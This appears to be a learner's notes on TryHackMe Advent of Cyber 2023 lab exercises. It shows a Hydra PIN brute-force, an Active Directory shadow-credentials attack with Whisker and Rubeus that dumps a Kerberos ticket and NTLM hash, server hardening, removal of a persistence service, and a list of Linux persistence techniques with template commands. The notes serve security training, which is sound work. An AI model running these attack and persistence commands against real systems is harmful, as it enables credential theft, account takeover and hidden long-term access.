TryHackMe - Advent of Cyber '23

Discover the world of cyber security by engaging in a beginner-friendly exercise every day in the lead-up to Christmas!

This is just a collection of notes I took when doing the Advent of Cyber room. I focused on the sidequest version because it was more challenging as it included difficulties hard to insance challenges. The main tasks of “Advent of Cyber” were mostly guided exercices and straightforward, but the sidequests were tougher and more interesting.

Day 3 - Hydra is Coming to Town

$ crunch 3 3 0123456789BCDEF -o combinations.txt

$ hydra -l "" -P combinations.txt -f 10.10.107.133 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-05 16:54:26
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 3375 login tries (l:1/p:3375), ~211 tries per task
[DATA] attacking http-post-form://10.10.107.133:8000/login.php:pin=^PASS^:Access denied
[8000][http-post-form] host: 10.10.107.133   password: 6F5
[STATUS] attack finished for 10.10.107.133 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-05 16:55:27

Day 6 - Memories of Christmas Past

Reverse hex as “an integer’s bytes are stored in reverse order in most desktop machines. This is known as the little-endian byte order.

>>> int('53504f4f', 16)
1397772111

Day 11 - Active Directory

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\hr> cd Desktop
PS C:\Users\hr\Desktop> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\hr\Desktop> . .\PowerView.ps1
PS C:\Users\hr\Desktop> Find-InterestingDomainAcl -ResolveGuids


ObjectDN                : CN=SOUTHPOLE,OU=Domain Controllers,DC=AOC,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-1966530601-3185510712-10604624-1111
IdentityReferenceName   : tracymcgreedy
IdentityReferenceDomain : AOC.local
IdentityReferenceDN     : CN=tracymcgreedy,CN=Users,DC=AOC,DC=local
IdentityReferenceClass  : user

...
...
...

ObjectDN                : CN=vansprinkles,CN=Users,DC=AOC,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : ListChildren, ReadProperty, GenericWrite
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-1966530601-3185510712-10604624-1115
IdentityReferenceName   : hr
IdentityReferenceDomain : AOC.local
IdentityReferenceDN     : CN=hr,CN=Users,DC=AOC,DC=local
IdentityReferenceClass  : user

PS C:\Users\hr\Desktop> Find-InterestingDomainAcl -ResolveGuids | Where-Object {$_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

IdentityReferenceName ObjectDN                                                    ActiveDirectoryRights
--------------------- --------                                                    ---------------------
hr                    CN=vansprinkles,CN=Users,DC=AOC,DC=local ListChildren, ReadProperty, GenericWrite


PS C:\Users\hr\Desktop> .\Whisker.exe add /target:vansprinkles
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password CoBKPuBUD9D2LjMP
[*] Searching for the target account
[*] Target user found: CN=vansprinkles,CN=Users,DC=AOC,DC=local
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 14676531-c805-45f4-9520-6b7597c8bdf9
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:vansprinkles /certificate:MIIJ__BASE64_BLOB_IH0A== /password:"CoBKPuBUD9D2LjMP" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show
PS C:\Users\hr\Desktop> ./Rubeus.exe asktgt /user:vansprinkles /certificate:MIIJ__BASE64_BLOB__IH0A== /password:"CoBKPuBUD9D2LjMP" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=vansprinkles
[*] Building AS-REQ (w/ PKINIT preauth) for: 'AOC.local\vansprinkles'
[*] Using domain controller: fe80::8829:a8ac:2d8c:883d%5:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
      T0MubG9jYWw=

  ServiceName              :  krbtgt/AOC.local
  ServiceRealm             :  AOC.LOCAL
  UserName                 :  vansprinkles
  UserRealm                :  AOC.LOCAL
  StartTime                :  12/12/2023 2:34:09 PM
  EndTime                  :  12/13/2023 12:34:09 AM
  RenewTill                :  12/19/2023 2:34:09 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  f4cjFwhWPplYurcQl7ecMA==
  ASREP (key)              :  80902887AE4CB7480CCAC23AAB7F90D0

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 03E805D8A8C5AA435FB48832DAD620E3

Dag 12 - Defensive in Depth

The goal is to set up defenses in multiple layers of the application and server.

Disable SSH password authentication

$ ssh admin@10.10.37.50
admin@jenkins:~$ sudo vi /etc/ssh/sshd_config
admin@jenkins:~$ awk 'NR==57 || NR==12' /etc/ssh/sshd_config
#Include /etc/ssh/sshd_config.d/*.conf
PasswordAuthentication no
root@jenkins:/etc/ssh/sshd_config.d# awk 'NR==58' /etc/ssh/sshd_config
#Ne3d2SecureTh1sSecureSh31l
admin@jenkins:~$ sudo systemctl restart ssh

Disable SSH password authentication

Disabling Anonymous access for Jenkins.

admin@jenkins:~$ sudo su
root@jenkins:/home/admin# cd /root
root@jenkins:~# ls
flag.txt  snap
root@jenkins:~# cat flag.txt
ezRo0tW1thoutDiD
root@jenkins:~# cd /var/lib/jenkins
root@jenkins:/var/lib/jenkins# vi config.xml.bak
root@jenkins:/var/lib/jenkins# mv config.xml.bak config.xml
root@jenkins:/var/lib/jenkins# sed -n '10,18p' config.xml 
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <FullTrust_has_n0_Place1nS3cur1ty>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
    <enableCaptcha>false</enableCaptcha>
  </securityRealm-->
  <disableRememberMe>false</disableRememberMe>
root@jenkins:/var/lib/jenkins# sudo systemctl restart jenkins

Day 18 - Eradication A Gift That Keeps on Giving

ubuntu@tryhackme:~$ top

top - 18:40:48 up 1 min,  0 users,  load average: 1.87, 0.90, 0.34
Tasks: 195 total,   2 running, 191 sleeping,   0 stopped,   2 zombie
%Cpu(s): 50.5 us,  0.2 sy,  0.0 ni, 49.3 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
MiB Mem :   3933.8 total,   2512.2 free,    620.2 used,    801.3 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.   3049.9 avail Mem 

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND  
    683 root      20   0    2488   1588   1492 R 100.0   0.0   1:22.39 a        
   1795 root      20   0  122148  26068   7636 S   0.7   0.6   0:00.15 python3  
    938 ubuntu    20   0  345036 121952  56956 S   0.3   3.0   0:02.92 Xtigerv+ 
   1807 ubuntu    20   0  471000  47564  37836 S   0.3   1.2   0:00.19 mate-te+ 
   1822 ubuntu    20   0    6276   3348   2852 R   0.3   0.1   0:00.02 top      
      1 root      20   0  102548  11688   8252 S   0.0   0.3   0:04.07 systemd  
      2 root      20   0       0      0      0 S   0.0   0.0   0:00.00 kthreadd 
      3 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_gp   
      4 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_par+ 
      5 root      20   0       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      6 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      7 root      20   0       0      0      0 I   0.0   0.0   0:00.08 kworker+ 
      8 root      20   0       0      0      0 I   0.0   0.0   0:00.01 kworker+ 
      9 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 mm_perc+ 
     10 root      20   0       0      0      0 S   0.0   0.0   0:00.07 ksoftir+ 
     11 root      20   0       0      0      0 I   0.0   0.0   0:00.21 rcu_sch+ 
     12 root      rt   0       0      0      0 S   0.0   0.0   0:00.00 migrati+ 
ubuntu@tryhackme:~$ sudo kill 683
ubuntu@tryhackme:~$ top

top - 18:41:11 up 2 min,  0 users,  load average: 1.79, 0.96, 0.38
Tasks: 195 total,   3 running, 190 sleeping,   0 stopped,   2 zombie
%Cpu(s): 53.3 us,  0.0 sy,  0.0 ni, 43.3 id,  0.0 wa,  0.0 hi,  0.0 si,  3.3 st
MiB Mem :   3933.8 total,   2512.3 free,    620.0 used,    801.4 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.   3050.1 avail Mem 

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND  
   1848 root      20   0    2488   1472   1384 R 100.0   0.0   0:05.17 a        
    938 ubuntu    20   0  345036 121952  56956 R   6.2   3.0   0:03.05 Xtigerv+ 
   1853 ubuntu    20   0    6276   3364   2868 R   6.2   0.1   0:00.01 top      
      1 root      20   0  102548  11688   8252 S   0.0   0.3   0:04.07 systemd  
      2 root      20   0       0      0      0 S   0.0   0.0   0:00.00 kthreadd 
      3 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_gp   
      4 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_par+ 
      5 root      20   0       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      6 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      7 root      20   0       0      0      0 I   0.0   0.0   0:00.08 kworker+ 
      8 root      20   0       0      0      0 I   0.0   0.0   0:00.01 kworker+ 
      9 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 mm_perc+ 
     10 root      20   0       0      0      0 S   0.0   0.0   0:00.07 ksoftir+ 
     11 root      20   0       0      0      0 I   0.0   0.0   0:00.21 rcu_sch+ 
     12 root      rt   0       0      0      0 S   0.0   0.0   0:00.00 migrati+ 
     13 root      20   0       0      0      0 S   0.0   0.0   0:00.00 cpuhp/0  
     14 root      20   0       0      0      0 S   0.0   0.0   0:00.00 cpuhp/1  
ubuntu@tryhackme:~$ crontab -l
@reboot sudo runuser -l ubuntu -c 'vncserver :1 -depth 24 -geometry 1900x1200'
@reboot sudo python3 -m websockify 80 localhost:5901 -D
ubuntu@tryhackme:~$ sudo su
root@tryhackme:/home/ubuntu# crontab -l
root@tryhackme:/home/ubuntu# systemctl list-unit-files
UNIT FILE                                      STATE           VENDOR PRESET
proc-sys-fs-binfmt_misc.automount              static          enabled      
-.mount                                        generated       enabled      
dev-hugepages.mount                            static          enabled      
dev-mqueue.mount                               static          enabled      
proc-sys-fs-binfmt_misc.mount                  disabled        enabled
...
...
...  
a-unkillable.service                           enabled         enabled      
accounts-daemon.service                        enabled         enabled      
acpid.service                                  disabled        enabled      
alsa-restore.service                           static          enabled      
alsa-state.service                             static          enabled      
alsa-utils.service                             masked          enabled      
...
...
...
root@tryhackme:/home/ubuntu# systemctl status a-unkillable.service
● a-unkillable.service - Unkillable exe
     Loaded: loaded (/etc/systemd/system/a-unkillable.service; enabled; vendor >
     Active: active (running) since Mon 2023-12-18 18:39:18 UTC; 4min 33s ago
   Main PID: 589 (sudo)
      Tasks: 5 (limit: 4710)
     Memory: 3.5M
     CGroup: /system.slice/a-unkillable.service
             ├─ 589 /usr/bin/sudo /etc/systemd/system/a service
             ├─ 666 /etc/systemd/system/a service
             └─1848 unkillable proc

Dec 18 18:39:18 tryhackme systemd[1]: Started Unkillable exe.
Dec 18 18:39:18 tryhackme sudo[589]:     root : TTY=unknown ; PWD=/ ; USER=root>
Dec 18 18:39:18 tryhackme sudo[589]: pam_unix(sudo:session): session opened for>
Dec 18 18:39:18 tryhackme sudo[692]: Merry Christmas
Dec 18 18:41:06 tryhackme sudo[1852]: Merry Christmas

root@tryhackme:/home/ubuntu# systemctl stop a-unkillable.service
root@tryhackme:/home/ubuntu# systemctl status a-unkillable.service
● a-unkillable.service - Unkillable exe
     Loaded: loaded (/etc/systemd/system/a-unkillable.service; enabled; vendor >
     Active: inactive (dead) since Mon 2023-12-18 18:45:00 UTC; 6s ago
    Process: 589 ExecStart=/usr/bin/sudo /etc/systemd/system/a service (code=ki>
   Main PID: 589 (code=killed, signal=TERM)

Dec 18 18:39:18 tryhackme systemd[1]: Started Unkillable exe.
Dec 18 18:39:18 tryhackme sudo[589]:     root : TTY=unknown ; PWD=/ ; USER=root>
Dec 18 18:39:18 tryhackme sudo[589]: pam_unix(sudo:session): session opened for>
Dec 18 18:39:18 tryhackme sudo[692]: Merry Christmas
Dec 18 18:41:06 tryhackme sudo[1852]: Merry Christmas
Dec 18 18:45:00 tryhackme systemd[1]: Stopping Unkillable exe...
Dec 18 18:45:00 tryhackme sudo[589]: pam_unix(sudo:session): session closed for>
Dec 18 18:45:00 tryhackme systemd[1]: a-unkillable.service: Succeeded.
Dec 18 18:45:00 tryhackme systemd[1]: Stopped Unkillable exe.

root@tryhackme:/home/ubuntu# top

top - 18:45:25 up 6 min,  0 users,  load average: 0.73, 0.99, 0.55
Tasks: 187 total,   1 running, 186 sleeping,   0 stopped,   0 zombie
%Cpu(s):  0.5 us,  0.2 sy,  0.0 ni, 99.2 id,  0.0 wa,  0.0 hi,  0.0 si,  0.2 st
MiB Mem :   3933.8 total,   2494.9 free,    617.7 used,    821.1 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.   3052.1 avail Mem 

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND  
    938 ubuntu    20   0  345036 121952  56956 S   1.0   3.0   0:08.48 Xtigerv+ 
   1795 root      20   0  123372  27368   7636 S   0.7   0.7   0:01.64 python3  
    590 root      20   0  237420   7492   6520 S   0.3   0.2   0:00.07 account+ 
   1194 lightdm   20   0  639700  45008  37472 S   0.3   1.1   0:00.86 slick-g+ 
   1807 ubuntu    20   0  472516  48728  38812 S   0.3   1.2   0:01.53 mate-te+ 
   1991 root      20   0   10996   3788   3276 R   0.3   0.1   0:00.01 top      
      1 root      20   0  104596  11796   8252 S   0.0   0.3   0:08.63 systemd  
      2 root      20   0       0      0      0 S   0.0   0.0   0:00.00 kthreadd 
      3 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_gp   
      4 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_par+ 
      6 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 kworker+ 
      8 root      20   0       0      0      0 I   0.0   0.0   0:00.01 kworker+ 
      9 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 mm_perc+ 
     10 root      20   0       0      0      0 S   0.0   0.0   0:00.14 ksoftir+ 
     11 root      20   0       0      0      0 I   0.0   0.0   0:00.24 rcu_sch+ 
     12 root      rt   0       0      0      0 S   0.0   0.0   0:00.00 migrati+ 
     13 root      20   0       0      0      0 S   0.0   0.0   0:00.00 cpuhp/0  
root@tryhackme:/home/ubuntu# systemctl disable a-unkillable.service
Removed /etc/systemd/system/multi-user.target.wants/a-unkillable.service.
root@tryhackme:/home/ubuntu# systemctl status a-unkillable.service
● a-unkillable.service - Unkillable exe
     Loaded: loaded (/etc/systemd/system/a-unkillable.service; disabled; vendor>
     Active: inactive (dead)

Dec 18 18:39:18 tryhackme systemd[1]: Started Unkillable exe.
Dec 18 18:39:18 tryhackme sudo[589]:     root : TTY=unknown ; PWD=/ ; USER=root>
Dec 18 18:39:18 tryhackme sudo[589]: pam_unix(sudo:session): session opened for>
Dec 18 18:39:18 tryhackme sudo[692]: Merry Christmas
Dec 18 18:41:06 tryhackme sudo[1852]: Merry Christmas
Dec 18 18:45:00 tryhackme systemd[1]: Stopping Unkillable exe...
Dec 18 18:45:00 tryhackme sudo[589]: pam_unix(sudo:session): session closed for>
Dec 18 18:45:00 tryhackme systemd[1]: a-unkillable.service: Succeeded.
Dec 18 18:45:00 tryhackme systemd[1]: Stopped Unkillable exe.

root@tryhackme:/home/ubuntu# rm -rf /etc/systemd/system/a
root@tryhackme:/home/ubuntu# rm -rf /etc/systemd/system/a-unkillable.service
root@tryhackme:/home/ubuntu# systemctl status a-unkillable.service
Unit a-unkillable.service could not be found.
root@tryhackme:/home/ubuntu# systemctl daemon-reload
root@tryhackme:/home/ubuntu# 

Top vs Process (ps)

• ps: just lists all processes
• top: sorts processes by resource consumption which could be interesting

Ways Attackers Could Gain Persistence on a Server

Common Techniques:

1. Modify user account to gain access:
   • Add a rogue SSH key: An attacker can add their own SSH key to the “.ssh/authorized_keys” file of a user account, allowing them to log in without needing a password.

     echo "ssh-rsa [ATTACKER_PUBLIC_KEY]" >> ~/.ssh/authorized_keys
     

   • Modify “.bashrc” file: By injecting malicious commands into the “.bashrc” file of a user, attackers can ensure that their code executes every time the user logs in.

     echo "malicious_command" >> ~/.bashrc
     

2. Create own privileged account:
   • Attackers may create their own privileged user account, granting them ongoing access to the system.

     sudo useradd -m malicious_user
     sudo passwd malicious_user
     

3. Start a process that is always running:
   • By starting a malicious process that runs continuously in the background, attackers can maintain persistence.

     nohup malicious_process &
     

4. Setup a Cronjob:
   • Attackers can create a cron job that periodically executes a malicious script or command, ensuring persistence.

     crontab -e
     

     Add the following line to the crontab: ```

     • • • • • /path/to/malicious_script.sh ```
5. Installing a service:
   • Installing a malicious service ensures that it runs continuously, providing persistent access to the system.

     sudo apt-get install malicious_service
     sudo service malicious_service start
     

Uncommon Techniques (not tested yet):

1. Kernel Module Rootkit:
   • Attackers can install a kernel module rootkit, which is a piece of software that modifies the behavior of the operating system’s kernel. This allows them to hide their activities and maintain access to the system.

     # Load a malicious kernel module
     sudo insmod malicious_module.ko
     

2. Backdoor in System Libraries:
   • Attackers might inject a backdoor into system libraries, such as libc, which are commonly used by various programs. This backdoor can provide them with ongoing access to the system.

     # Inject malicious code into a system library
     echo "malicious_code" >> /lib/libc.so.6
     

3. Tamper with System Startup Scripts:
   • Attackers could modify system startup scripts to execute malicious commands or scripts every time the system boots, ensuring persistence even after a reboot.

     # Add a malicious command to a system startup script
     echo "malicious_command" >> /etc/init.d/rc.local
     

4. Steganography:
   • Attackers might hide malicious code or commands within seemingly innocuous files, such as image or audio files, which are then executed by unsuspecting users or processes.

     # Embed malicious code into an image file
     cat malicious_code.jpg >> innocent_image.jpg
     

5. Exploiting Vulnerable Software:
   • If there are known vulnerabilities in software running on the server, attackers can exploit these vulnerabilities to gain persistent access.

     # Exploit a known vulnerability in a web server
     exploit-apache-vulnerability.py